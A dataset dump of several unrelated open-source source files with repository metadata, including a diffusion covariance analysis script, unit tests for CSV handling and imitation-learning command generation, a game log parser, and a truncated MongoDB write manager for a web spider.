blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 2
616
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
69
| license_type
stringclasses 2
values | repo_name
stringlengths 5
118
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringlengths 4
63
| visit_date
timestamp[us] | revision_date
timestamp[us] | committer_date
timestamp[us] | github_id
int64 2.91k
686M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 23
values | gha_event_created_at
timestamp[us] | gha_created_at
timestamp[us] | gha_language
stringclasses 220
values | src_encoding
stringclasses 30
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 2
10.3M
| extension
stringclasses 257
values | content
stringlengths 2
10.3M
| authors
listlengths 1
1
| author_id
stringlengths 0
212
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
9ac55e5dbd0041a00a974e7c8b20ab991e00d9c3
|
e40d5e30fb375589aa22efe2a4258f45cee99ce8
|
/src/common/SConscript
|
820fd7ffb580ec11c95fbc7d1ca8975217aaaac3
|
[] |
no_license
|
mironside/rabid
|
dfc0868a43b01fd4453981f50739af092e9889fe
|
70c7d4c27202b518a9412ae8a9a29ab6097c39c0
|
refs/heads/master
| 2016-09-10T11:23:09.351459 | 2013-04-23T16:15:55 | 2013-04-23T16:15:55 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 423 |
srcfiles = [
'console.cpp',
'leakTracer.cpp',
'log.cpp',
'profile.cpp',
'cbuf.cpp',
'commandSystem.cpp',
'cvarSystem.cpp',
'common.cpp',
'timer.cpp',
'keys.cpp',
'defMgr.cpp',
'def.cpp',
]
subdirs = ['fileSystem',
]
Import('env')
objs = []
if len(srcfiles) > 0:
objs += env.Object(srcfiles)
for dir in subdirs:
objs += env.SConscript(dir + '/SConscript')
Return('objs')
|
[
"chrisaolsen@gmail.com"
] |
chrisaolsen@gmail.com
|
|
91c805fdec4b684631cbcdd4b9d943daae660904
|
823d010b24a1f6b3800cbaa071f7b8126f43ffc1
|
/infer_D_through_autocorrelation_2D.py
|
6d721c07de252dc036451641e21e5a9f9cc312a0
|
[] |
no_license
|
Alexander-Serov/out-of-equilibrium-detection
|
fe31aae88022c7ba381b75642c545a19828913c6
|
40d0630af3709fbceb234edcdff2d24aab7ef6b9
|
refs/heads/master
| 2021-06-18T13:34:43.240628 | 2020-02-20T13:25:48 | 2020-02-20T13:25:48 | 156,554,754 | 1 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,989 |
py
|
# infer_D_through_autocorrelation_1D.py
# %%
try:
bl_has_run
except Exception:
%matplotlib
%load_ext autoreload
%autoreload 2
bl_has_run = True
import os
import pickle
import matplotlib.pyplot as plt
import numpy as np
from numpy import arctan, cos, pi, sin
from tqdm import tqdm
from hash_me import hash_me
from simulate_2d_confined import \
simulate_2_confined_particles_with_fixed_angle_bond
# # %% Constants
# dr = np.array([-0.9, 18])
# U = get_rotation_matrix(dr)
# U @ dr
# %% Constants
D1 = 5 # um^2/s; 0.4
D2 = 1 # um^2/s
k12 = 1e-6 # kg/s^2. Somehting interesting happens at 5e-7
T = 5e1 # s
gamma = 1e-8 # viscous drag, in kg/s
lags = range(10)
# D_ratios = [0.1, 0.5, 1.0, 5, 10]
def get_rotation_matrix(dr):
"""Return a rotation matrix that rotates the given vector to be aligned with the positive direction of x axis"""
tan_theta = - dr[1] / dr[0] if dr[0] != 0 else np.inf * (-dr[1])
if dr[0] >= 0:
theta = arctan(tan_theta)
else:
theta = arctan(tan_theta) + pi
# print(theta / pi)
# theta = 0
R = np.array([[cos(theta), - sin(theta)], [sin(theta), cos(theta)]])
return R
def locally_rotate_a_vector(dR, lag):
"""Create a vector, such that its component at position j+lag were defined by a rotation matrix for position j, which aligns the vector at position j with the axis x"""
N = dR.shape[1]
rotated = np.full_like(dR, np.nan)
for j in range(N - lag):
dr = dR[:, j]
RM = get_rotation_matrix(dr)
rotated[:, j] = RM @ dR[:, j + lag]
return rotated
# 4.86/2.36
# D1/D2
fig = plt.figure(num=2, clear=0)
fig.clear()
ax = fig.gca()
ax.plot([0, np.max(lags)], [0] * 2, 'k')
# for D_ratio in D_ratios:
# print(D_ratio)
# D1 = D2 * D_ratio
recalculate = 1
hash = hash_me('2D', D1, D2, k12, T, gamma)
filename = 'data/data_' + hash + '.pyc'
if os.path.exists(filename) and recalculate == False:
with open(filename, 'rb') as file:
t, X, dX, Y, dY = pickle.load(file)
else:
t, X, dX, Y, dY = simulate_2_confined_particles_with_fixed_angle_bond(D1=D1, D2=D2, k12=k12, gamma=gamma,
T=T, plot=True, save=False)
with open(filename, 'wb') as file:
pickle.dump([t, X, dX, Y, dY], file, pickle.HIGHEST_PROTOCOL)
dt = t[1] - t[0]
# %
# Covariance of dX
particle = 2 # 1 or 2
variable = dX[particle - 1, :]
dR1 = np.array([dX[0, :], dY[0, :]])
dR2 = np.array([dX[1, :], dY[1, :]])
# variable = np.sum(dX, axis=0) / 2
# I will be looking at particle 2. The particle 1 will be the changing invisible one
N = dR2.shape[1]
cov_parallel = np.zeros(len(lags)) * np.nan
mean_orthogonal = np.full_like(cov_parallel, np.nan)
var_orthogonal = np.full_like(cov_parallel, np.nan)
cov_orthogonal = np.full_like(cov_parallel, np.nan)
cov_y = np.full_like(cov_parallel, np.nan)
# For each dx I need to find the appropriate rotated lagged vector
for i, lag in enumerate(tqdm(lags, desc='Calculating covariances')):
# i = 0
# lag = 0
rot_0 = locally_rotate_a_vector(dR2, 0)
rot_lag = locally_rotate_a_vector(dR2, lag)
# Calculate the covariance between the x componnents of the new vectors
cov_parallel[i] = np.nanmean(rot_0[0, :] * rot_lag[0, :])
# Calculate the mean orthogonal component
mean_orthogonal[i] = np.nanmean(rot_lag[1, :])
# Calculate the variance of the orthogonal component
var_orthogonal[i] = np.nanvar(rot_lag[1, :])
cov_orthogonal[i] = np.nanmean(rot_0[0, :] * rot_lag[1, :])
cov_y[i] = np.nanmean(rot_0[1, :] * rot_lag[1, :])
# print(cov_x / D2 / dt)
# cov[i] = np.mean(variable[0:N - 1 - lag] * variable[lag:N - 1])
cov_parallel_norm = cov_parallel / (D2 * dt)
mean_orthogonal_norm = mean_orthogonal / np.sqrt(D2 * dt)
var_orthogonal_norm = var_orthogonal / (D2 * dt)
cov_orthogonal_norm = cov_orthogonal / (D2 * dt)
cov_y_norm = cov_y / (D2 * dt)
# cn1 = cov_norm
print(cov_parallel_norm)
print(mean_orthogonal_norm)
print(var_orthogonal_norm)
print(cov_orthogonal_norm)
# print(cn10 - cn1)
# Plot the covariances
# , label=f'$D_1/D_2 = $ {D_ratio:.2f}')
ax.plot(lags, cov_parallel_norm, '-o',
label='$\\overline{\\Delta x_n \\Delta x_{n+j}}$')
ax.plot(lags, mean_orthogonal_norm, '-o',
label='$\\overline{\\Delta y_{n+j}}$')
ax.plot(lags, var_orthogonal_norm, '-o',
label='$\\overline{(\\Delta y_{n+j})^2}$')
# ax.plot(lags, cov_orthogonal_norm, '-o',
# label='$\\overline{\\Delta x_n \\Delta y_{n+j}}$')
ax.plot(lags, cov_y_norm, '-o',
label='$\\overline{\\Delta y_n \\Delta y_{n+j}}$')
# plt.plot(lags, cn10-cn1, '-x')
plt.figure(num=2)
# plt.ylabel('$\\overline{\\Delta x_n \\Delta x_{n+j}}$')
plt.ylabel('Covariances')
plt.xlabel('Lag $j$')
plt.ylim([-1, 5.0])
plt.title(f'$D_2 = {D2:.2f}$')
plt.legend()
fig.show()
# %%
# figname = 'figs/covariance_dif_increase_other_D'
# fig.savefig(figname + '.pdf')
# fig.savefig(figname + '.png')
|
[
"asserov@gmail.com"
] |
asserov@gmail.com
|
f532f6eae4a880f02144914a4ecc060970c1f4bb
|
110b716c7234f931cbceda819e96f31f0ffb2615
|
/test_main.py
|
144df1573dd9157cbc3cc2c3cb2dbf607dc275ae
|
[] |
no_license
|
moktanaj/python-solution
|
17ae888e389b74df46493e38fbecbf87230e5fc6
|
ad8b4f8d271e6f201bf5a22d6baf96550163af50
|
refs/heads/main
| 2023-02-13T08:22:56.754853 | 2021-01-09T18:33:56 | 2021-01-09T18:33:56 | 328,187,024 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,543 |
py
|
import io
from main import *
from unittest import mock
@mock.patch("main.open_file")
def test_read_csv(mock_close_file_and_exit):
f = io.StringIO("some initial text data")
mock_close_file_and_exit.return_value = f
got_data = read_csv("does_not_exist.csv")
assert got_data == {}
def test_read_csv_with_file():
expected_dict = {'0': {'user_pseudo_id': '0', 'First': 'John', 'Last': 'Doe', 'Age': '55', 'Country': 'USA'}, '1': {'user_pseudo_id': '1', 'First': 'Ajay', 'Last': 'Moktan', 'Age': '35', 'Country': 'AUS'}}
got_data = read_csv("data/test_csv_correct.csv")
assert expected_dict == got_data
got_data = read_csv("data/test_csv.csv")
assert got_data == {}
@mock.patch("main.sys.exit")
def test_close_file_and_exit(mock_sys_exit):
# Testing happy path
close_file_and_exit(None, "example file")
mock_sys_exit.assert_called_with(1)
# Testing with incorrect file handler path
close_file_and_exit("incorrect file", "example file")
mock_sys_exit.assert_called_with(1)
def test_open_file_with_correct_file():
file_path = "data/test_csv.csv"
file = open_file(file_path, 'r')
assert file.name == file_path
@mock.patch("main.close_file_and_exit")
def test_open_file_with_incorrect_file(mock_close_file_and_exit):
file_path = "does_not_exist_test_file.csv"
error_message = "Error in file operation [Errno 2] No such file or directory: '{}'".format(file_path)
open_file(file_path, 'r')
mock_close_file_and_exit.assert_called_with(None, error_message)
|
[
"moktanaj@gmail.com"
] |
moktanaj@gmail.com
|
c6061d5f295fed6a46483bf27ca17b45bf838027
|
4c7ea6295a487ec18543e82f66e08a3a2a2fd124
|
/apps/logs/action/action_monster_level_reward.py
|
8a7e07ee77cf001a6d538be71ca87a390ab9e53c
|
[] |
no_license
|
robot-nan/GameLogServer
|
16217689d88ac5353a61881b03adb1b372cc3e16
|
ff2afd6d29e9dce6157a66ff62b4d1ea97d04184
|
refs/heads/master
| 2021-11-07T21:27:30.494271 | 2015-09-23T15:01:55 | 2015-09-23T15:01:55 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,292 |
py
|
# -*- coding:utf-8 -*-
"""
宠物等级奖励
"""
from apps.logs.action import action_base
from apps.utils import game_define
def log(user, gold, stone, equip_str, item_str):
"""
输出日志
"""
action = game_define.EVENT_ACTION_GET_MONSTER_LEVEL
cur_gold = user.player.get_gold()
cur_stone = user.player.get_stone()
log_lst = action_base.log_base(user)
log_lst.append(str(action))
log_lst.append(str(gold))
log_lst.append(str(cur_gold))
log_lst.append(str(stone))
log_lst.append(str(cur_stone))
log_lst.append(str(equip_str))
log_lst.append(str(item_str))
log_str = '$$'.join(log_lst)
return log_str
def parse(log_part_lst):
"""
解析
"""
result = dict()
result['action'] = int(log_part_lst[0])
result['add_gold'] = int(log_part_lst[1])
result['cur_gold'] = int(log_part_lst[2])
result['add_stone'] = int(log_part_lst[3])
result['cur_stone'] = int(log_part_lst[4])
result['add_equip_list'] = action_base.get_val(log_part_lst, 5, [], True)
result['add_item_list'] = action_base.get_val(log_part_lst, 6, [], True)
result['old_gold'] = result['cur_gold'] - result['add_gold']
result['old_stone'] = result['cur_stone'] - result['add_stone']
return result
|
[
"a.robot.n@gmail.com"
] |
a.robot.n@gmail.com
|
96b3f469a19190afd2c4b5b108d36137e49ac8d2
|
055581f9d6c81eda2f73ea05b90b7a2256da1219
|
/parts/zodiac/zope/interface/common/tests/test_import_interfaces.py
|
876383faf7234e93c6a5f7995278350ec5f54606
|
[] |
no_license
|
Tosti770/zodiac
|
488a91c3e872a62d09a3ebb22a951dadcbd1c2df
|
af0380e20eb90699a84e3b7c6cb2085a1fb81667
|
refs/heads/master
| 2020-04-13T06:54:26.333228 | 2014-03-03T20:10:11 | 2014-03-03T20:10:11 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 121 |
py
|
/home/ruben/zodiac/eggs/zope.interface-4.0.5-py2.7-linux-x86_64.egg/zope/interface/common/tests/test_import_interfaces.py
|
[
"ruben_tc@hotmail.es"
] |
ruben_tc@hotmail.es
|
7ae1e204325dc9f0f443b7e2531a8b7ac35da9ae
|
38bc29ca0f7ec65d9b4f030d01aaafc8c82928e0
|
/minder/forms.py
|
c8c4b80005e5d2251412bca21ca591bd849e4b3d
|
[] |
no_license
|
nkarim496/MindStream
|
7164fea85517276513b9c083aa42b54cec60160f
|
48768de70255c927d1271437e4365467bf8894a8
|
refs/heads/master
| 2021-07-21T22:53:04.666624 | 2017-10-28T01:04:17 | 2017-10-28T01:04:17 | 108,609,580 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 170 |
py
|
from django.forms import ModelForm
from minder.models import Mind
class MindForm(ModelForm):
class Meta:
model = Mind
fields = ['mind', 'mind_img']
|
[
"nkarim496@gmail.com"
] |
nkarim496@gmail.com
|
3bc24697dee04be43497c122b3028c6926362734
|
b213fbd2f4f628aa0f2387c846673ac68e18aa91
|
/Binary_Search/600.py
|
4e544b47614dc36d42421f95f4fbc7fd3ea4e675
|
[
"MIT"
] |
permissive
|
wilbertgeng/LintCode_exercise
|
94309b4451e34f1931fce6c2ae90d0c2e7c41d35
|
e7a343b746e98ca3b4bc7b36655af7291f3150db
|
refs/heads/main
| 2023-05-13T06:06:50.887791 | 2021-05-26T20:33:51 | 2021-05-26T20:33:51 | 347,850,106 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,701 |
py
|
"""600. Smallest Rectangle Enclosing Black Pixels
"""
class Solution:
"""
@param image: a binary matrix with '0' and '1'
@param x: the location of one of the black pixels
@param y: the location of one of the black pixels
@return: an integer
"""
def minArea(self, image, x, y):
# write your code here
if not image or not image[0]:
return 0
m = len(image)
n = len(image[0])
left = self.findFirst(image, 0, y, self.checkColumn)
right = self.findLast(image, y, n - 1, self.checkColumn)
up = self.findFirst(image, 0, x, self.checkRow)
down = self.findLast(image, x, m - 1, self.checkRow)
return (right - left + 1) * (down - up + 1)
def findFirst(self, image, start, end, checkFunc):
while start + 1 < end:
mid = (start + end) // 2
if not checkFunc(image, mid):
start = mid
else:
end = mid
if checkFunc(image, start):
return start
return end
def findLast(self, image, start, end, checkFunc):
while start + 1 < end:
mid = (start + end) // 2
if not checkFunc(image, mid):
end = mid
else:
start = mid
if checkFunc(image, end):
return end
return start
def checkRow(self, image, row):
for i in range(len(image[0])):
if image[row][i] == "1":
return True
return False
def checkColumn(self, image, col):
for i in range(len(image)):
if image[i][col] == "1":
return True
return False
|
[
"wilbertgeng@gmail.com"
] |
wilbertgeng@gmail.com
|
3fffc2ba463ecceee2069ca4cf30b9a15adf8ed4
|
d7c80095dce650af870ffd406ab2b2083299c603
|
/3.1 Population Dynamics/module2.py
|
aa4f5203d4e125cf00c2618ae10ef63642c9228e
|
[] |
no_license
|
vpjuguilon/AppPhysics156
|
c46e8ac655943f0f94842e45244d84524a02cfff
|
69ed54db4fc2cac52824ba774ea78b108343c3a0
|
refs/heads/master
| 2020-04-04T01:55:39.041134 | 2019-06-23T02:43:31 | 2019-06-23T02:43:31 | 155,682,155 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 608 |
py
|
from matplotlib.pyplot import plot, show, scatter, hist, xlabel, ylabel
from numpy import linspace
def f(x, r):
return 4*r*x*(1-x)
R = 0.9642
xvals = linspace(0, 1, 1000)
ypara = f(xvals, R)
plot(xvals, xvals, 'k-')
plot(xvals, ypara, 'k-')
Xhistogram = [0.65]
for j in range(1000):
Xhistogram.append(f(Xhistogram[j], R))
Xhistogram = Xhistogram[99:949]
Ypop = []
Xpop = []
for k in Xhistogram:
Xpop.append(k)
Ypop.append(f(k, R))
Xpop.append(f(k, R))
Ypop.append(f(k, R))
plot(Xpop, Ypop, 'k.-', linewidth = 0.1)
xlabel('x')
ylabel('f(x)')
show()
|
[
"noreply@github.com"
] |
vpjuguilon.noreply@github.com
|
be4ca29e261b08db9e72e699d5ce956447bcecb4
|
828282d212d33667f05818d144ce1534db0d1584
|
/tests/test_experiments.py
|
0f6d314fe61773b25392c907c5c50f5368f0d952
|
[
"MIT"
] |
permissive
|
HumanCompatibleAI/imitation
|
bdbb167d8e1abc0fb629d18ac88121a096881d43
|
5b0b531bdf6fdfcaab93ff18f454aa1b54bb4355
|
refs/heads/master
| 2023-08-17T08:29:01.192792 | 2023-08-11T07:57:29 | 2023-08-11T07:57:29 | 160,906,482 | 936 | 203 |
MIT
| 2023-09-14T12:04:40 | 2018-12-08T05:15:33 |
Python
|
UTF-8
|
Python
| false | false | 12,459 |
py
|
"""Tests for commands.py + Smoke tests for bash scripts in experiments/."""
import glob
import os
import pathlib
import subprocess
from typing import List
import pytest
SCRIPT_NAMES = (
"bc_benchmark.sh",
"dagger_benchmark.sh",
"benchmark_and_table.sh",
"imit_benchmark.sh",
"rollouts_from_policies.sh",
"transfer_learn_benchmark.sh",
)
THIS_DIR = pathlib.Path(__file__).absolute().parent
BENCHMARKING_DIR = THIS_DIR.parent / "benchmarking"
EXPERIMENTS_DIR = THIS_DIR.parent / "experiments"
COMMANDS_PY_PATH = EXPERIMENTS_DIR / "commands.py"
EXPECTED_LOCAL_CONFIG_TEMPLATE = """python -m imitation.scripts.train_imitation dagger \
--capture=sys --name=run0 --file_storage={output_dir}/sacred/\
$USER-cmd-run0-dagger-0-8bf911a8 \
with benchmarking/fast_dagger_seals_cartpole.json \
seed=0 logging.log_root={output_dir}"""
EXPECTED_HOFVARPNIR_CONFIG_TEMPLATE = """ctl job run \
--name $USER-cmd-run0-dagger-0-c3ac179d \
--command "python -m imitation.scripts.train_imitation dagger \
--capture=sys --name=run0 --file_storage={output_dir}/sacred/\
$USER-cmd-run0-dagger-0-c3ac179d \
with /data/imitation/benchmarking/fast_dagger_seals_cartpole.json \
seed=0 logging.log_root={output_dir}" \
--container hacobe/devbox:imitation \
--login --force-pull --never-restart --gpu 0 \
--shared-host-dir-mount /data"""
def _get_benchmarking_path(benchmarking_file):
return os.path.join(BENCHMARKING_DIR.stem, benchmarking_file)
def _run_commands_from_flags(**kwargs) -> List[str]:
"""Run commands.py with flags derived from the given `kwargs`.
This is a helper function to reduce boilerplate code in the tests
for commands.py.
Each key-value pair in kwargs corresponds to one flag.
If the value in the key-value is True, then the flag has the form "--key".
If the value in the key-value is a list, then the flag has the form
"--key value[0] value[1] ..."
Otherwise, the flag has the form "--key=value".
E.g., _run_commands_from_flags(name="baz", seeds=[0, 1], remote=True)
will execute the following python command:
python experiments/commands.py --name=baz --seeds 0 1 --remote
The function will return the parsed output of executing that command.
Args:
kwargs: keyword arguments from which to derive flags.
Returns:
A list where the ith entry of the list is the ith line printed out
by the python command.
"""
flags = []
# Add some defaults so that most tests can skip specifying these flags.
if "name" not in kwargs:
flags.append("--name=run0")
if "cfg_pattern" not in kwargs:
cfg_pattern = _get_benchmarking_path("fast_dagger_seals_cartpole.json")
flags.append("--cfg_pattern=" + cfg_pattern)
if "output_dir" not in kwargs:
flags.append("--output_dir=output")
# Build the flags.
for key in kwargs:
if isinstance(kwargs[key], bool) and kwargs[key]:
flag = f"--{key}"
elif isinstance(kwargs[key], list):
value = " ".join(map(str, kwargs[key]))
flag = f"--{key} {value}"
else:
flag = f"--{key}={kwargs[key]}"
flags.append(flag)
py_command = f"python {COMMANDS_PY_PATH} " + " ".join(flags)
completed_process = subprocess.run(
py_command,
shell=True,
capture_output=True,
stdin=subprocess.DEVNULL,
check=True,
)
# Each line of the formatted stdout is a command.
formatted_stdout = completed_process.stdout.decode("ascii").strip()
commands = formatted_stdout.split("\n")
return commands
def test_commands_local_config():
if os.name == "nt": # pragma: no cover
pytest.skip("commands.py not ported to Windows.")
commands = _run_commands_from_flags()
assert len(commands) == 1
expected = EXPECTED_LOCAL_CONFIG_TEMPLATE.format(output_dir="output")
assert commands[0] == expected
def test_commands_local_config_runs(tmpdir):
if os.name == "nt": # pragma: no cover
pytest.skip("commands.py not ported to Windows.")
commands = _run_commands_from_flags(output_dir=tmpdir)
assert len(commands) == 1
expected = EXPECTED_LOCAL_CONFIG_TEMPLATE.format(output_dir=tmpdir)
assert commands[0] == expected
completed_process = subprocess.run(
commands[0],
shell=True,
capture_output=True,
stdin=subprocess.DEVNULL,
check=True,
)
assert completed_process.returncode == 0
assert (tmpdir / "dagger" / "seals-CartPole-v0").exists()
assert (tmpdir / "sacred").exists()
def test_commands_local_config_with_custom_flags():
if os.name == "nt": # pragma: no cover
pytest.skip("commands.py not ported to Windows.")
commands = _run_commands_from_flags(
name="baz",
seeds=1,
output_dir="/foo/bar",
)
assert len(commands) == 1
expected = """python -m imitation.scripts.train_imitation dagger \
--capture=sys --name=baz --file_storage=/foo/bar/sacred/\
$USER-cmd-baz-dagger-1-8bf911a8 \
with benchmarking/fast_dagger_seals_cartpole.json \
seed=1 logging.log_root=/foo/bar"""
assert commands[0] == expected
def test_commands_hofvarpnir_config():
if os.name == "nt": # pragma: no cover
pytest.skip("commands.py not ported to Windows.")
output_dir = "/data/output"
commands = _run_commands_from_flags(output_dir=output_dir, remote=True)
assert len(commands) == 1
expected = EXPECTED_HOFVARPNIR_CONFIG_TEMPLATE.format(output_dir=output_dir)
assert commands[0] == expected
def test_commands_hofvarpnir_config_with_custom_flags():
if os.name == "nt": # pragma: no cover
pytest.skip("commands.py not ported to Windows.")
commands = _run_commands_from_flags(
name="baz",
remote_cfg_dir="/bas/bat",
seeds=1,
output_dir="/foo/bar",
container="bam",
remote=True,
)
assert len(commands) == 1
expected = """ctl job run --name $USER-cmd-baz-dagger-1-345d0f8a \
--command "python -m imitation.scripts.train_imitation dagger \
--capture=sys --name=baz --file_storage=/foo/bar/sacred/\
$USER-cmd-baz-dagger-1-345d0f8a \
with /bas/bat/fast_dagger_seals_cartpole.json \
seed=1 logging.log_root=/foo/bar" --container bam \
--login --force-pull --never-restart --gpu 0 \
--shared-host-dir-mount /data"""
assert commands[0] == expected
def test_commands_local_config_with_special_characters_in_flags(tmpdir):
if os.name == "nt": # pragma: no cover
pytest.skip("commands.py not ported to Windows.")
# Simulate running commands.py with the following flag:
# --output_dir="\"/tmp/.../foo bar\""
# And generating a training command with the following flag:
# --logging.log_root="/tmp/.../foo bar"
#
# If we didn't enclose the directory in quotes as in:
# --output_dir=/tmp/.../foo bar
# Then we would get an "unrecognized arguments: bar" error
# trying to run commands.py.
#
# Or if we enclosed the directory in double quotes as in:
# --output_dir="/tmp/.../foo bar"
# Then we would generate a training command with the following flag:
# --logging.log_root=/tmp/.../foo bar
# And we would get an error trying to run the generated command.
output_subdir = "foo bar"
unquoted_output_dir = (tmpdir / f"{output_subdir}").strpath
output_dir = '"\\"' + unquoted_output_dir + '\\""'
commands = _run_commands_from_flags(output_dir=output_dir)
assert len(commands) == 1
# The extra double quotes are removed in the generated command.
# It has the following flag:
# --logging.log_root="/tmp/.../foo bar"
# So it can run without an error introduced by the space.
expected = EXPECTED_LOCAL_CONFIG_TEMPLATE.format(
output_dir='"' + unquoted_output_dir + '"',
)
assert commands[0] == expected
def test_commands_hofvarpnir_config_with_special_characters_in_flags(tmpdir):
if os.name == "nt": # pragma: no cover
pytest.skip("commands.py not ported to Windows.")
# See the comments in
# test_commands_local_config_with_special_characters_in_flags
# for a discussion of special characters in the flag values.
output_subdir = "foo bar"
unquoted_output_dir = (tmpdir / f"{output_subdir}").strpath
output_dir = '"\\"' + unquoted_output_dir + '\\""'
commands = _run_commands_from_flags(output_dir=output_dir, remote=True)
assert len(commands) == 1
# Make sure double quotes are escaped in the training script command
# because the training script command is itself enclosed in double
# quotes within the cluster command.
expected = EXPECTED_HOFVARPNIR_CONFIG_TEMPLATE.format(
output_dir='\\"' + unquoted_output_dir + '\\"',
)
assert commands[0] == expected
def test_commands_bc_config():
if os.name == "nt": # pragma: no cover
pytest.skip("commands.py not ported to Windows.")
cfg_pattern = _get_benchmarking_path("example_bc_seals_ant_best_hp_eval.json")
commands = _run_commands_from_flags(cfg_pattern=cfg_pattern)
assert len(commands) == 1
expected = """python -m imitation.scripts.train_imitation bc \
--capture=sys --name=run0 --file_storage=output/sacred/\
$USER-cmd-run0-bc-0-138a1475 \
with benchmarking/example_bc_seals_ant_best_hp_eval.json \
seed=0 logging.log_root=output"""
assert commands[0] == expected
def test_commands_dagger_config():
if os.name == "nt": # pragma: no cover
pytest.skip("commands.py not ported to Windows.")
cfg_pattern = _get_benchmarking_path("example_dagger_seals_ant_best_hp_eval.json")
commands = _run_commands_from_flags(cfg_pattern=cfg_pattern)
assert len(commands) == 1
expected = """python -m imitation.scripts.train_imitation dagger \
--capture=sys --name=run0 --file_storage=output/sacred/\
$USER-cmd-run0-dagger-0-6a49161a \
with benchmarking/example_dagger_seals_ant_best_hp_eval.json \
seed=0 logging.log_root=output"""
assert commands[0] == expected
def test_commands_gail_config():
if os.name == "nt": # pragma: no cover
pytest.skip("commands.py not ported to Windows.")
cfg_pattern = _get_benchmarking_path("example_gail_seals_ant_best_hp_eval.json")
commands = _run_commands_from_flags(cfg_pattern=cfg_pattern)
assert len(commands) == 1
expected = """python -m imitation.scripts.train_adversarial gail \
--capture=sys --name=run0 --file_storage=output/sacred/\
$USER-cmd-run0-gail-0-3ec8154d \
with benchmarking/example_gail_seals_ant_best_hp_eval.json \
seed=0 logging.log_root=output"""
assert commands[0] == expected
def test_commands_airl_config():
if os.name == "nt": # pragma: no cover
pytest.skip("commands.py not ported to Windows.")
cfg_pattern = _get_benchmarking_path("example_airl_seals_ant_best_hp_eval.json")
commands = _run_commands_from_flags(cfg_pattern=cfg_pattern)
assert len(commands) == 1
expected = """python -m imitation.scripts.train_adversarial airl \
--capture=sys --name=run0 \
--file_storage=output/sacred/$USER-cmd-run0-airl-0-400e1558 \
with benchmarking/example_airl_seals_ant_best_hp_eval.json \
seed=0 logging.log_root=output"""
assert commands[0] == expected
def test_commands_multiple_configs():
if os.name == "nt": # pragma: no cover
pytest.skip("commands.py not ported to Windows.")
# Test a more complicated `cfg_pattern`.
cfg_pattern = _get_benchmarking_path("*.json")
commands = _run_commands_from_flags(cfg_pattern=cfg_pattern)
assert len(commands) == len(glob.glob(cfg_pattern))
def test_commands_multiple_configs_multiple_seeds():
if os.name == "nt": # pragma: no cover
pytest.skip("commands.py not ported to Windows.")
cfg_pattern = _get_benchmarking_path("*.json")
seeds = [0, 1, 2]
commands = _run_commands_from_flags(
cfg_pattern=cfg_pattern,
seeds=seeds,
)
n_configs = len(glob.glob(cfg_pattern))
n_seeds = len(seeds)
assert len(commands) == (n_configs * n_seeds)
@pytest.mark.parametrize(
"script_name",
SCRIPT_NAMES,
)
def test_experiments_fast(script_name: str):
"""Quickly check that experiments run successfully on fast mode."""
if os.name == "nt": # pragma: no cover
pytest.skip("bash shell scripts not ported to Windows.")
exit_code = subprocess.call([f"./{EXPERIMENTS_DIR.stem}/{script_name}", "--fast"])
assert exit_code == 0
|
[
"noreply@github.com"
] |
HumanCompatibleAI.noreply@github.com
|
a1d78a24879670100945b229da0affe9517608fe
|
c04a7a9627e2914c92d48d473ada6214e9044d9b
|
/music_spider/common/DbManager.py
|
d2f4f7289ff12e8ab9a1e32b5ff778e9af2a161b
|
[] |
no_license
|
xsren/uplooking_spider
|
b00194399f927a21cb395698fadd076413e39754
|
e4d9cfed8c9f28458df5806d583109e58b9391d6
|
refs/heads/master
| 2020-03-24T11:20:20.500996 | 2018-08-18T09:12:37 | 2018-08-18T09:12:37 | 142,682,770 | 1 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 9,791 |
py
|
# coding:utf8
import sys
import time
import traceback
from queue import Queue
from pymongo import UpdateOne, ReplaceOne, InsertOne, UpdateMany
from pymongo.errors import BulkWriteError
from twisted.internet import reactor, defer
# 本地库
sys.path.append('../main')
import settings
import common
class DbManager:
def __init__(self, logger, mc, write_queues, task_queues, count_queue):
self.logger = logger
self.mc = mc
self.write_queues = write_queues
self.task_queues = task_queues
self.count_queue = count_queue
def init_write_queue(self, dbName, collName):
if self.write_queues.get(dbName, None) == None:
self.write_queues[dbName] = {}
self.write_queues[dbName][collName] = Queue(maxsize=settings.write_queue_size)
else:
if self.write_queues[dbName].get(collName, None) == None:
self.write_queues[dbName][collName] = Queue(maxsize=settings.write_queue_size)
def init_task_queue(self, dbName, collName):
if self.task_queues.get(dbName, None) == None:
self.task_queues[dbName] = {}
self.task_queues[dbName][collName] = Queue(maxsize=settings.write_queue_size)
else:
if self.task_queues[dbName].get(collName, None) == None:
self.task_queues[dbName][collName] = Queue(maxsize=settings.write_queue_size)
'''
一般网站公用的处理代码 common
'''
def cleanup_handle_queue(self):
self.logger.info("clear ... cleanup begin")
try:
reactor.callInThread(self._handle_write_queue, 1)
# self._handle_write_queue(limit=1)
self._handle_count_queue(limit=1)
except BulkWriteError as bwe:
self.logger.error(bwe.details)
# you can also take this component and do more analysis
werrors = bwe.details['writeErrors']
self.logger.error(werrors)
except Exception as e:
self.logger.error(str(e))
traceback.print_exc()
self.logger.info("clear ... cleanup end")
def _handle_write_queue(self, limit):
for dbName, v in self.write_queues.items():
for collName, _queue in v.items():
if _queue.qsize() >= limit:
t0 = time.time()
requests, dups = [], []
qsize = _queue.qsize()
while _queue.qsize() > 0:
try:
tup = _queue.get_nowait()
_queue.task_done()
except Exception as e:
self.logger.error(str(e))
break
if tup[0] in dups:
continue
else:
dups.append(tup[0])
requests.append(tup[1])
if len(requests) > 0:
self.mc[dbName][collName].bulk_write(requests)
t_diff = time.time() - t0
